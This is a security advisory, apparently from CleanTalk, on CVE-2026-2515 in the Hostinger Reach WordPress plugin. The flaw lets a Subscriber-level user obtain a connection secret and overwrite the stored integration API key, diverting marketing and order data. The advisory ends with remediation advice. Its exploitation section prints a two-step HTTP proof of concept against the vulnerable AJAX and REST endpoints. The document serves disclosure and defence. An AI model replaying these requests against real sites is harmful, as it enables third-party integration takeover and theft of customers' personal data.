CVE-2026-2515 affects Hostinger Reach and it is a missing authorization vulnerability that allows a low privilege authenticated user to trigger an admin only site connection flow and ultimately overwrite the persistent Reach bearer credential stored in WordPress options. The practical security outcome is not a minor UI glitch. It is third party integration takeover. A Subscriber can rebind the WordPress site to an attacker controlled Reach tenant, disrupt the legitimate integration, and potentially divert marketing data and automation feeds. On sites where WooCommerce related automation is enabled, the downstream impact can extend to billing and order PII flowing into the attacker account because the plugin believes it is still connected to the correct Reach backend.
| CVE | CVE-2026-2515 |
| Plugin Version | Hostinger Reach <= 1.3.8 |
| All Time | 12 367 997 |
| Active installations | 1 000 000+ |
| Publicly Published | May 12, 2026 |
| Last Updated | May 12, 2026 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2515 https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hostinger-reach/hostinger-reach-138-missing-authorization-to-authenticated-subscriber-integration-api-key-update |
| Plugin Security Certification by CleanTalk |  |
| Logo of the plugin |  |
PSC by CleantalkJoin the community of developers who prioritize security. Highlight your plugin in the WordPress catalog.
Timeline
| February 4, 2026 | Plugin testing and vulnerability detection in the Hostinger Reach have been completed |
| February 4, 2026 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| May 12, 2026 | Registered CVE-2026-2515 |
Discovery of the Vulnerability
The vulnerable chain starts with the AJAX entrypoint wp_ajax_hostinger_reach_connection_notice_action exposed through wp-admin/admin-ajax.php. That handler verifies only a nonce through check_ajax_referer and then executes a sensitive action path like handle_connect without enforcing an administrative capability such as manage_options. That is the first authorization failure. It effectively grants low privilege users the ability to request a connection authorization URL that contains a short lived CSRF secret token parameter intended for the next binding step. The design inconsistency is important. The equivalent operation in the REST API to generate an auth URL is protected by a permission check that requires manage_options, which demonstrates that this is an admin restricted operation, yet the AJAX route provides an alternative path that bypasses that restriction. The second step is a REST endpoint used to bind the token. The token binding route accepts a csrf_field and validates it through a CSRF validator, yet it does not require authentication or a capability check. That means once a low privilege user obtains the CSRF secret from the first step, they can call the token endpoint and overwrite the stored integration key. The root cause is the same in both steps. Nonces and CSRF tokens are treated as authorization rather than as request integrity primitives, and capabilities are not enforced at the entrypoints where the side effects occur.
Understanding of Missing Auth attack’s
In WordPress, nonce checks prevent cross site request forgery. They do not prove a user is allowed to perform an action. Authorization must be enforced with capabilities, and for sensitive operations those capabilities should be administrative. Integration connect flows are among the highest risk features in plugins because they issue secrets, store bearer tokens, and create a data channel to an external platform. When those flows can be initiated by low roles, attackers can use a simple Subscriber account as a pivot into business data. In real deployments, plugins like this often sync leads, user identifiers, and marketing events, and when ecommerce automation is enabled they may also process customer profiles and order metadata. This is why CVE-2026-2515 is not just a privilege escalation inside WordPress. It is integration credential overwrite that moves trust and data across platforms. Many compromise chains seek exactly that because it is stealthier than taking over WordPress directly. The business still sees the plugin working, yet the data is going to the wrong tenant.
Exploiting the Missing Auth Vulnerability
To exploit CVE-2026-2515, an attacker with Subscriber+ cookies or with CSRF:
POC:
POST /wp-admin/admin-ajax.php HTTP/1.1 Host: 138.124.55.33 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://138.124.55.33/wp-admin/index.php Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 79 Origin: http://138.124.55.33 DNT: 1 Sec-GPC: 1 Connection: keep-alive Cookie: Subscriber+ nonce=532e772992&action=hostinger_reach_connection_notice_action&choice=connect POST /index.php/wp-json/hostinger-reach/v1/token HTTP/1.1 Host: 138.124.55.33 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://138.124.55.33/wp-admin/index.php Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 78 Origin: http://138.124.55.33 DNT: 1 Sec-GPC: 1 Connection: keep-alive csrf_field=MWkHd1Vd7rxM&token=jAXCgBfhtfEcXOz____REDACTED____qMZDojPDduNMC80927f96____
The most severe outcome is silent takeover of the site external integration. Once the attacker overwrites hostinger_reach_api_key, the plugin may start sending data to the attacker tenant. That can include marketing leads and site activity data, and it can include customer and order information if WooCommerce automation is enabled. Even without ecommerce, the attacker can disrupt operations by disconnecting the legitimate account, breaking marketing funnels, and forcing administrators to re authorize the integration. Another realistic scenario is competitive sabotage. An attacker registers an account, rebinds the integration, and then the business loses visibility into its own leads while the attacker gains insight into campaign performance. Because the operation is fast and relies only on Subscriber access, it can be automated and repeated even after remediation attempts unless the underlying authorization checks are fixed. The problem also creates a cover path for follow on attacks. By controlling the integration, attackers can influence what external dashboards show, which can be used for social engineering and for hiding abnormal activity. This is why the vulnerability has both confidentiality and integrity dimensions, and why the token overwrite step is the critical escalation point.
Recommendations for Improved Security
The fix must enforce least privilege at both steps of the flow. The AJAX entrypoint that generates the auth URL must require manage_options or an equivalent administrative capability before it executes handle_connect. It should validate capability first, then nonce, then perform side effects, because nonce validation alone does not restrict the operation to admins. The token binding REST endpoint must require authentication and a capability check, and it should not accept a bare csrf_field as sufficient authorization. If the endpoint must be publicly callable for onboarding, it must use a single use, time limited, server issued binding token that is tied to the currently authenticated administrator and to the specific site, and it must be validated server side with strict expiry and replay protection. It should also log integration key changes with actor, IP, and timestamp and provide an admin notice when the integration key is updated. Site owners should rotate Reach credentials after patching, review integration logs for unexpected rebind events, and restrict wp-admin access for low roles where possible, because exposing admin context to Subscribers increases the chance that nonces are leaked and abused.
By taking proactive measures to address Missing Auth like CVE-2026-2515 WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
#WordPressSecurity #MissingAuth #WebsiteSafety #StayProtected #HighVulnerability
Use CleanTalk solutions to improve the security of your website